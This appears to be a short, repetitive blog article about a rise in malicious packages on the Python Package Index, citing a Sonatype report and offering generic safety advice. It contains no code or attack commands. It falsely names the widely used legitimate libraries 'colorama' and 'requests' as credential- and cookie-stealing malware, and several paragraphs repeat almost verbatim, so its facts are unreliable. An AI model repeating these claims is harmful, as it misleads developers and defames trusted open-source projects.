The Python Package Index (PyPI) is the official repository for third-party Python packages. But it seems that it has been infiltrated by spam packages. According to a report from security firm Sonatype, there has been a sharp increase in the number of malicious Python packages uploaded to PyPI in recent months. In the first half of 2019, there were only four malicious Python packages detected. But in the second half of the year, that number jumped to more than 30.
The majority of these malicious packages are designed to steal sensitive information from the computers they are installed on. For example, one package called “colorama” is designed to steal SSH and GPG keys. Another package called “requests” is designed to steal cookies.
How spam flooded official python package
Spammers are able to upload their packages to PyPI because they have figured out how to bypass the automated checks that are supposed to flag suspicious packages. Sonatype’s researchers believe that the spammers are using automated tools to generate large numbers of fake accounts, which they then use to upload their packages.
How dangerous is it
These malicious packages are not particularly widespread at the moment. But they could become more common if the spammers are able to continue bypassing PyPI’s security checks. If you do use PyPI, then you should be extra careful about which packages you install. Only install packages from developers that you trust. And be sure to check the code of any package before you install it.
Why this is happening
It’s not clear why the spammers are targeting PyPI. It could be that they are hoping to make money by selling access to the computers that their packages are installed on. Or it could be that they are trying to gather information for some other purpose. Either way, it’s important to be aware of the problem so that you can protect yourself.
How to protect yourself
If you use PyPI, then you should be extra careful about which packages you install. Only install packages from developers that you trust. And be sure to check the code of any package before you install it. You can also use a tool like pip-check to check for known security vulnerabilities in the packages you have installed.
How was spam able to flood PyPI and what damage did it do
The Python Package Index (PyPI) is the official repository for third-party Python packages, but it has been infiltrated by spam packages. A report from security firm Sonatype found that there was a sharp increase in the number of malicious Python packages uploaded to PyPI in the second half of 2019 – from four to more than 30. The majority of these packages are designed to steal sensitive information from the computers they are installed on.
What measures have been put in place to prevent spam from infiltrating PyPI again in the future
Sonatype’s researchers believe that the spammers are using automated tools to generate large numbers of fake accounts, which they then use to upload their packages. To prevent this from happening in the future, PyPI has put in place a new system that requires new users to verify their email address before they can upload packages. This should make it much harder for spammers to create fake accounts and upload their packages.
